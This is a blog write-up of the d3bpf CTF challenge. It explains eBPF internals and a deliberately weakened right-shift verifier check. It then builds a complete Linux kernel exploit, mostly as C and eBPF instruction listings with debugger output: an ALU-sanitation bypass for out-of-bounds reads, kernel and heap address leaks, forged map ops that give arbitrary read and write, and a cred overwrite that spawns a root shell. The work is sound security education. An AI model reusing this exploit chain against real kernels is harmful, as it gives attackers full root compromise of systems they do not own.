This post is gonna be about eBPF exploitation using a CTF challenge from D^3CTF named d3bpf. I have learnt so much while trying this challenge that I want to document all those findings and understanding as a future reference. All snippets gonna be from v5.11 kernel as the challenge uses this version. Lets dig right in.

(e)BPF

What is eBPF?

eBPF stands for extended Berkeley Packet Filter. Originally, BPF was intended for, as the name suggests, packet filtering. But because of its ease-of-use, it was later extended to eBPF. It provides a small instruction set for implementing various kinds of kernel programs which can be added to any supporting kernel version. Some example programs would be kprobe and packet filters. The provided code will be added to the kernel and will run under the kernel’s context. This very feature made it the prime target of vulnerability researchers.
Initially, eBPF was allowed for all users (a few type of programs).

eBPF programs

eBPF code is given to the kernel in form of a eBPF program. Each type of eBPF program have their own capabilities and features. One example would be BPF_PROG_TYPE_SOCKET_FILTER. This type of program are used for packer filtering and are attached to a particular socket, which is owned by the user. Whenever the socket receives a packet, the eBPF program is executed for performing packet filtering.
eBPF programs undergo checking by the kernel mechanism called eBPF verifier. eBPF verifier checks the program for potentially illegal or dangerous functionality. If the program makes it past the verifier, only then it is included into the kernel. eBPF programs also have a 512 byte-sized stack. struct

eBPF Maps

The main mechanism for interacting with eBPF programs is eBPF Maps. Maps are created by the user. They are key-value pairs. There are two main types of Maps, array or hash-table.
In case of array map, key is the index and value are bytes at that index. While creating Maps, user can provide key size, value size and no. of entries. Key size cannot be greater than 4 bytes but value size and no. of entries can be arbitrary. This makes a buffer in the kernel. Each map has a set of operations defined. struct

eBPF instruction set

Covering full eBPF instruction set is out of scope of this article, I will only explain a few things. You can read about eBPF instruction in detail here. eBPF provides ten registers BPF_REG_{0..10}. BPF_REG_{1..5} are used for calling functions (more on this later). The return value is stored in BPF_REG_0 and BPF_REG_10 is frame pointer for eBPF stack. When an eBPF program is ran, BPF_REG_1 contains pointer to eBPF context which contains some information about the eBPF program.
In eBPF terminology, immediates are called scalars and pointers are any values which are derived from pointers. It means that you can only get certain types of pointers in eBPF and we can obtain these pointers using eBPF defined routines or registers already containing pointers (BPF_REG_1, PTR_TO_CTX (context) and BPF_REG_10, PTR_TO_STACK (fp)) (e.g. CONST_PTR_TO_MAP can be obtained using BPF_LD_MAP_FD instruction and PTR_TO_MAP_VALUE_OR_NULL can be obtained using bpf_map_lookup_elem function). You cannot treat an arbitrary value as a pointer since that is inherently dangerous in kernel context (in which eBPF programs execute). By default, all user-defined values (values in maps, values on stack etc) are considered scalars (immediates) and can only be converted to pointers by performing (allowed) pointer arithmetic with previously mentioned pointers. Lastly, arithmetic between two pointers results in a scalar.
To put a scalar into (say) BPF_REG_1:

BPF_MOV64_IMM(BPF_REG_1, 1337)

Almost every instruction has a 32-bit and 64-bit variant and almost every instruction has a version for register and immediate. For example to put a 32-bit scalar to BPF_REG_1 and move BPF_REG_1 to BPF_REG_2:

BPF_MOV32_IMM(BPF_REG_1, 1337)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_1)

You can perform mathematical operations using ALU{32,64} on registers using the following syntax:

BPF_ALU{32,64}_{IMM,REG}(P, BPF_REG_DEST, BPF_REG|IMM)
e.g. BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1337)

You can perform addition, subtraction, multiplication, division, and bit shifting on scalars.
For pointers, only addition and subtraction are allowed.
Every eBPF program should end in an exit instruction:

BPF_EXIT_INSN()

For loading and storing values from memory using pointers, you can used following instructions:

BPF_LDX_MEM(SIZE, BPF_REG_SRC, BPF_REG_DEST, OFFSET)
BPF_STX_MEM(SIZE, BPF_REG_DEST, BPF_REG_SRC, OFFSET)

e.g.
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0) -> BPF_REG_2 = *(u64 *)(BPF_REG_1 + 0)
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0) -> *(u64 *)(BPF_REG_1 + 0) = BPF_REG_2

eBPF also provides logical jumps:

BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1)
BPF_EXIT_INSN()

eBPF provides a few functions which can be called in eBPF programs. We will only be using map functions in this case. For map functions (BPF_FUNC_map_{name}), BPF_REG_6 should contain pointer to context and BPF_REG_{1..5} contain the arguments. After a call, BPF_REG_{1..5} contain no values (set to unknown) because they are caller-saved registers and other registers are callee-saved registers. All map function require the map pointer to be in BPF_REG_1. Following is call example:

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
BPF_LD_MAP_FD(BPF_REG_1, <map fd>)
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem)

If your program is of type BPF_PROG_TYPE_SOCKET_FILTER, you can use following instruction to load values from the sk_buff buffer:

BPF_LD_ABS(SIZE, OFF)

Note that this will also clear the caller-saved registers.
I think this is enough.

For example programs, look at this link.

eBPF verifier

eBPF verifier is the most important component in eBPF as it ensures that no dangerous program will get executed. In a nutshell, the verifier (bpf_check) visits each instruction and perform checks specific to the instruction and the context it is running in. For example, if we’re performing a pointer arithmetic operation, it needs to make sure that we don’t break out of the allowed area.
For this purpose, it keeps track of all register states based on previous operations and updates the register states after visiting an instruction. The register state is stored in a struct named bpf_reg_state. It keeps track of min and max values, signed and unsigned both.
Verifier blocks uninitialised memory/register access, oob pointer arithmetic, storing pointers in maps, returning pointers, invalid arguments for function calls etc.
Here eBPF verifier is kinda like the typer in chrome/chromium. It keeps track of everything and makes speculations based on the information it has. And like the typer, it has bugs which can be used to mislead the verifier into making wrong assumptions about the program. But, like the typer, it also adds runtime checks for the speculations it makes.

ALU Sanitation

ALU Sanitation is part of verifier which enforces the eBPF speculations at runtime. If the program is given by root, then there’s no ALU Sanitation as root can already read kernel pointer using kallsyms. ALU Sanitation is done on pointers. Before each addition or subtraction (on pointers), following instructions are added:

BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1); // -1 in old kernel versions
BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);

Here BPF_REG_AX is auxiliary register used by eBPF, off_reg is the register containing the offset to be added/subtracted from the pointer and alu_limit is the maximum value allowed for that operation. This set of instruction basically ensure that no value greater than alu_limit - 1 gets added/subtraction from the pointer. alu_limit is calculated based on the verifier’s information about that register.
But If the information the verifier have is wrong than alu_limit is wrong and hence the whole thing can be bypassed.
Lets take an example, suppose that a pointer is at 0x1000 and it is allowed to go upto 0x2500. Then using some vulnerability we make the verifier think that the pointer is still at 0x1000 but actually it is 0x0. In this case, the alu_limit for subtraction and addition will be 0x1000 and 0x1500 respectively. Hence we can access, 0x1000 data before that pointer (OOB read/write). This problem is highlighted here.
But what if alu_limit == 0? Then ALU Sanitation will enforce a limit of 0xffffffff. So we can add or subtract any 32-bit value.
This bug was fixed in new kernel versions.

eBPF Execution

If the program makes it past the verifier then (based on kernel config) it is either set to be interpreted at runtime or jited to machine code.

d3bpf

The challenge files are available here.

Patch analysis

The challenge adds a patch to one of the verifier functions for BPF_RSH (bitwise right shift).

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 37581919e..8e98d4af5 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -6455,11 +6455,11 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
             scalar_min_max_lsh(dst_reg, &src_reg);
         break;
     case BPF_RSH:
-        if (umax_val >= insn_bitness) {
-            /* Shifts greater than 31 or 63 are undefined.
-             * This includes shifts by a negative number.
-             */
-            mark_reg_unknown(env, regs, insn->dst_reg);
+        if (umin_val >= insn_bitness) {
+            if (alu32)
+                __mark_reg32_known(dst_reg, 0);
+            else
+                __mark_reg_known_zero(dst_reg);
             break;
         }
         if (alu32)

adjust_scalar_min_max_vals function is called whenever an instruction is visited to update the verifier state information about scalar regiters involved.
To break it down, if the unsigned mininum value (umin_val) of a register is greater than the instruction bit size (insn_bitness) (32 or 64) then the register is set to be known to contain 0. This in simple terms means that if a 64 bit value is right shifted by a value greater than or equal to 64 then it contains 0 and same is true for 32 bit values.
Intuitively, it seems right that if a value is right shifted by a value greater than its size then it should contain zero. Then why did the original code say that shifts greater than 31/63 are undefined?
Lets verify the new code. I read the Intel instruction manual, there shifts are implemented by first applying a mask on the value by which the shifting is to be done. The mask (in 64-bit mode) is 0x3f. So, when we do shr rax, 64, shift is done as shr rax, 64 & 0x3f. 64 & 0x3f is 0. Therefore, there is no shifting done and the original value remains unchanged. But the verifier assumes that it will be zero, in contrast the actual value can be anything.
The given kernel is compiled with CONFIG_BPF_JIT_ALWAYS_ON and will always compile the eBPF program to machine code.

Triggering vuln

My first attempt was following:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <syscall.h>
#include <linux/bpf.h>
#include <sys/socket.h>
#include "bpf_insn.h"

int socks[2] = {-1};

int bpf(int cmd, union bpf_attr *attr){
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int bpf_prog_load(union bpf_attr *attr){
    return bpf(BPF_PROG_LOAD, attr);
}

union bpf_attr* create_bpf_prog(struct bpf_insn *insns, unsigned int insn_cnt){
    union bpf_attr *attr = (union bpf_attr *) malloc(sizeof(union bpf_attr));

    attr->prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr->insn_cnt = insn_cnt;
    attr->insns = (uint64_t) insns;
    attr->license = (uint64_t)"";

    return attr;
}

int attach_socket(int prog_fd){
    if(socks[0] == -1 && socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0){
        perror("socketpair");
        exit(1);
    }
    
    if(setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0){
        perror("setsockopt");
        exit(1);
    }
}

void setup_bpf_prog(struct bpf_insn *insns, uint insncnt){
    char log_buffer[0x4000];

    union bpf_attr *prog = create_bpf_prog(insns, insncnt);

    prog->log_level = 2;
    prog->log_buf = (uint64_t) log_buffer;
    prog->log_size = sizeof(log_buffer);
    strncpy(prog->prog_name, "stdnoerr", 16);

    int prog_fd = bpf_prog_load(prog);
    printf("%d\n", strlen(log_buffer));
    puts(log_buffer);

    if(prog_fd < 0){
        perror("prog_load");
        exit(1);
    }

    attach_socket(prog_fd);
}

void run_bpf_prog(struct bpf_insn *insns, uint insncnt){
    int val = 0;

    setup_bpf_prog(insns, insncnt);
    write(socks[1], &val, sizeof(val));
}

int main(){
    struct bpf_insn insns[] = {
        BPF_MOV64_IMM(BPF_REG_0, 0x1337),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_0, 64),
        BPF_EXIT_INSN()
    };

    run_bpf_prog(insns, sizeof(insns)/sizeof(insns[0]));
}

I set a breakpoint at *sk_filter_trim_cap + 140 to see the code in action. The code compilation failed with the following logger buffer output

func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (b7) r0 = 4919
1: R0_w=invP4919 R1=ctx(id=0,off=0,imm=0) R10=fp0
1: (77) r0 >>= 64
invalid shift 64
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0

This error is because of this line. The verifier actually already has a check for invalid shifts. But this check is only for immediate values.
If we put 64 in another register and use that for shifting, we trigger the vuln.

BPF_MOV64_IMM(BPF_REG_0, 0x1337),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1),
BPF_EXIT_INSN()

And voila! we triggered the vuln.

Getting a leak

Now that we have a value that the verifier thinks is 0, we can use it to perform pointer arithmetic to access out-of-bounds memory. Accessing oob memory of a map can be used to get a kernel leak. eBPF maps use the following struct:

struct bpf_map {
	const struct bpf_map_ops *ops ____cacheline_aligned;
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u32 map_flags;
	int spin_lock_off; /* >=0 valid offset, <0 error */
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
	struct mem_cgroup *memcg;
#endif
	char name[BPF_OBJ_NAME_LEN];
	u32 btf_vmlinux_value_type_id;
	bool bypass_spec_v1;
	bool frozen; /* write-once; write-protected by freeze_mutex */
	atomic64_t refcnt ____cacheline_aligned;
	atomic64_t usercnt;
	struct work_struct work;
	struct mutex freeze_mutex;
	u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */

    // map specific data
};

We will be using only Array maps (BPF_MAP_TYPE_ARRAY) in the exploit. Its struct is as follows:

struct bpf_array {
	struct bpf_map map;
	u32 elem_size;
	u32 index_mask;
	struct bpf_array_aux *aux;
	union {
		char value[0] __aligned(8);
		void *ptrs[0] __aligned(8);
		void __percpu *pptrs[0] __aligned(8);
	};
};

ops contains a kernel pointer since the allowed functions for a certain map type are declared at compile time.
For Array map, ops will contain array_map_ops. We can use that to calculate kernel base.
We will use a map with a key size of 4, values size of 0x150 and max_entries 1.

oob_map_fd = bpf_map_create(4, 0x150, 1);

We will use BPF_FUNC_map_lookup_elem to get a pointer to the value correponding to the key (basically a pointer to start of user-controlled data).

// load map_ptr_or_null in BPF_REG_0
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
// returns map_ptr + 0x110 (offset of .values in bpf_array)

// convert map_ptr_or_null -> map_ptr to perform further operations
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

Now we use the verifier’s wrong assumption about the register with value of 0 (say BPF_REG_0) to perform pointer subtraction on it to move it back to start of bpf_array struct so we can read ops pointer. To do that, we need to bypass ALU Sanitation also.
Lucky for us, there’s an easy bypass here. Remember the alu_limit = 0 issue?
We will use that. Currently, the pointer returned by map_lookup_elem (say data_ptr, BPF_REG_7) is equal to map_ptr + 0x110. We move 0x110 into BPF_REG_0 and trigger the vuln to make the verifier think it’s 0, then we subtract BPF_REG_0 from data_ptr to make it map_ptr + 0x0. The alu_limit calculated for this subtraction is 0 and the alu_limit - 1 turns it into 0xffffffff which lets us subtract 0x110 gracefully.

// trigger vuln and make eBPF think we are still map_ptr + 0x110
// but in reality we're map_ptr + 0x0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
// ALU Sanitation will set alu_limit = 0 but alu_limit - 1 will be used
// hence any 32-bit value can be used
BPF_MOV64_IMM(BPF_REG_0, 0x110),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1), // the bug
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0), // map_ptr + 0x110 -> map_ptr + 0x0

Now we read ops and write it at map_ptr + 0x110 to read it from userspace.

// load the ptr (kbase leak)
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),
// make map_ptr + 0x0 to map_ptr + 0x110
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x110), 
// write array_map_ops ptr to maps_ptr + 0x110
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),

And we get the kbase:

array_map_ops: 0xffffffff820363a0
kbase: 0xffffffff81000000

When I stepped through program using gdb, I saw something interesting in map data:

gef➤  x/26gx 0xffff888004e23400   <-- map_ptr
0xffff888004e23400:     0xffffffff820363a0      0x0000000000000000
0xffff888004e23410:     0x0000000000000000      0x0000000400000002
0xffff888004e23420:     0x0000000100000150      0xffffffea00000000
0xffff888004e23430:     0xffffffff00000001      0x0000000000000000
0xffff888004e23440:     0x0000000000000000      0xffff88800392b000
0xffff888004e23450:     0x0000000000000000      0x0000000000000000
0xffff888004e23460:     0x0000000000000000      0x0000000000000000
0xffff888004e23470:     0x0000000000000000      0x0000000000000000
0xffff888004e23480:     0x0000000000000002      0x0000000000000001
0xffff888004e23490:     0x0000000000000000      0x0000000000000000
0xffff888004e234a0:     0x0000000000000000      0x0000000000000000
0xffff888004e234b0:     0x0000000000000000      0x0000000000000000
0xffff888004e234c0:     0xffff888004e234c0      0xffff888004e234c0 <-- a self-pointer

This is because of bpf_map’s member work (type work_struct). It contains a doubly-linked list (to keep track of bpf maps?). We can use it to leak map_ptr.

// map_ptr + 0x0 -> map_ptr + 0xc0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),
// load the ptr (heap leak)
BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
// make map_ptr + 0xc0 to map_ptr + 0x110
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x50),
// write *(map_ptr + 0xc0) to maps_ptr + 0x118
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_9, 8),
array_map_ops: 0xffffffff820363a0
kbase: 0xffffffff81000000
map_ptr: 0xffff888004e1a800

Here’s the main function so far:

int oob_map_fd = bpf_map_create(4, 0x150, 1);

struct bpf_insn kleak_prog[] = {
    // load map_ptr_or_null in BPF_REG_0
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
    BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
    BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
    // returns map_ptr + 0x110 (offset of .values in array_map)

    // map_ptr_or_null -> map_ptr
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // trigger vuln and make eBPF think we are still map_ptr + 0x110
    // but in reality we're map_ptr + 0x0
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
    // ALU Sanitation will set alu_limit = 0 but alu_limit - 1 will be used
    // hence any 32-bit value can be used
    BPF_MOV64_IMM(BPF_REG_0, 0x110),
    BPF_MOV64_IMM(BPF_REG_1, 64),
    BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1), // the bug
    BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // load the ptr (kbase leak)
    
    // map_ptr + 0x0 -> map_ptr + 0xc0
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0), // load the ptr (heap leak)

    // write the read ptr to map for reading it from userspace
    // make map_ptr + 0xc0 to map_ptr + 0x110
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x50), 
    // write array_map_ops ptr to maps_ptr + 0x110
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
    // write map_ptr + 0xc0 to maps_ptr + 0x118
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_9, 8),
    BPF_EXIT_INSN(),
};

run_bpf_prog(kleak_prog, sizeof(kleak_prog)/sizeof(kleak_prog[0]));

uint64_t array_map_ops = bpf_map_lookup_elem(oob_map_fd, 0, 0);
uint64_t map_ptr = bpf_map_lookup_elem(oob_map_fd, 0, 1) - 0xc0;
uint64_t kbase = array_map_ops - ARRAY_MAP_OPS_OFFSET;

printf("array_map_ops: %p\nkbase: %p\nmap_ptr: %p\n", array_map_ops, kbase, map_ptr);

Arbitrary Read & Write

I found two methods for achieving this.
One by Manfred Paul @_manfp decribed here.
One by R @n0psledbyte showcased here.

Manfred’s method is great for multiple kernels and allows doing multiple reads and writes with running new bpf programs, but needs two different programs for read and write.
On other hand, R just makes a single program to overwrite modprobe_path.

I wanted to make a single program which allows multiple reads/writes from userspace. Here I present you a method to so. This method is NOT like Manfred method which can be easily used for multiple kernels. This method is reliant on some offsets but it sums up my knowledge of eBPF for now.

To understand this, we need to know about a few things. Lets start.
First off, since JIT is enabled in this kernel, the ebpf program will be jitted. When eBPF programs are jitted, the map functions they call, are converted to calls to those functions directly. This means that the jitted program will NOT use the ops value at runtime to find out the right function. The address of the function will be embedded in the code (according to ops at jit-time). Whereas, if the program is being interpreted, it will always retrieve the pointer from ops. map_lookup_elem is a special case, instead of embedding the function’s address into the code, a function name map_gen_lookup is used to generate equivalent eBPF instructions which will become part of the eBPF program (like the ALU Sanitation checks).
Each map type has its own map_gen_lookup. R found that lookup functions for map type BPF_MAP_TYPE_ARRAY_OF_MAPS are a bit unique and useful for exploitation. Here’s the function:

static void *array_of_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_map **inner_map = array_map_lookup_elem(map, key);

	if (!inner_map)
		return NULL;

	return READ_ONCE(*inner_map);
}

It dereferences the value returned by simple array_map_lookup_elem which returns a pointer to value.
You might be asking that, “What is your plan exactly?”
My plan is to overwrite ops pointer of a map to a user-controlled value and fake a bpf_map_ops with custom array_of_map_gen_lookup. Then make a program use the map to inline the dereferencing and use that to read/write arbitrary values in kernel.
The eBPF verifier thinks that map_lookup_elem returns a pointer to a map_value but this will make the pointer user controlled (since the user controls the data of the map and it dereferences it). So, it will let us read/write values from/to it since it think we’re reading/writing from/to the map values.
eBPF verifier uses bpf_func_proto for checks on functions calls.

Overwrite Ops

We will overwrite ops of arb_read_write_map. But first we need a fake bpf_map_ops, we will use oob_map for this. We will only write map_update_elem, map_lookup_elem and map_gen_lookup.

BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

// setup fake bpf_map_ops struct with only needed values
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // move map_ptr + 0x110
BPF_MOV64_IMM(BPF_REG_0, kbase + ARRAY_MAP_UPDATE_ELEM_OFFSET),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 12 * 8),

BPF_MOV64_IMM(BPF_REG_0, kbase + ARRAY_MAP_LOOKUP_ELEM_OFFSET),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 11 * 8),

BPF_MOV64_IMM(BPF_REG_0, kbase + 0x20e9c0), // array_of_map_gen_lookup
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 19 * 8),

Now we will overwrite ops of arb_read_write_map. For this we use the map_lookup_elem like the previous program to make the data_ptr point to map_ptr + 0x0 instead of map_ptr + 0x110 and write oob_map_ptr + 0x110 to ops.

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, arb_read_write_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // get values ptr

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

// trigger vuln
BPF_MOV64_IMM(BPF_REG_0, 0x110),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0),

// special instruction to load 64-bit immediates
BPF_LD_IMM64(BPF_REG_0, map_ptr + 0x110), // oob_map_ptr + 0x110

// overwrite ops with oob_map_ptr + 0x110
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),

BPF_EXIT_INSN(),

Arbitrary Read & Write program

Now we will make a program which will use map_lookup_elem on arb_read_write_map to trigger array_of_map_gen_lookup during jitting.

BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, 0, -4),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, arb_read_write_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // will use array_of_map_gen_lookup

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

We will use a third map info_map for the communication part. We will tell the program to either do read or write using the socket. The read value will be written to info_map and the value to write will be taken from info_map also.

BPF_LD_ABS(BPF_B, 0), // loads a byte from the socket
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // decide byte for arb_read or arb_write

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, info_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_JMP_IMM(BPF_JEQ, BPF_REG_9, 1, 4), // 0 for read, 1 for write

BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // arb_read
BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_7, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // arb_write
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

I wrote two functions for each:

uint64_t arb_read(uint64_t addr){
    int req = 0;

    bpf_map_update_elem(arb_read_write_map_fd, 0, &addr, BPF_ANY);

    write(socks[1], &req, sizeof(req));

    return bpf_map_lookup_elem(info_map_fd, 0, 0);
}

int arb_write(uint64_t addr, uint64_t val){
    int req = 1;

    bpf_map_update_elem(arb_read_write_map_fd, 0, &addr, BPF_ANY);
    bpf_map_update_elem(info_map_fd, 0, &val, BPF_ANY);

    write(socks[1], &req, sizeof(req));

    // check if the value is written or not
    // used for debugging
    return bpf_map_lookup_elem(info_map_fd, 0, 0) == val;
}

And with that I achieved what I wanted. (sigh)
Now to complete the challenge, I overwrote current->cred with init_cred.

uint64_t current_task_struct = arb_read(arb_read(__per_cpu_offset) + current_task);
uint64_t init_cred = kbase + INIT_CRED_OFFSET;

arb_write(current_task_struct + CRED_OFFSET, init_cred);

system("/bin/sh");

If you want to exit gracefully, you need to repair the overwritten ops to original value.

My final exploit is available here.

Finally I want to thank Mafred Paul, R and @chompie1337 for the amazing content about the subject.
If you wanna talk, hit me up on discord stdnoerr#7880 or twitter @stdnoerr.

References:


stdnoerr

CTFer | pwner | wanna learn everything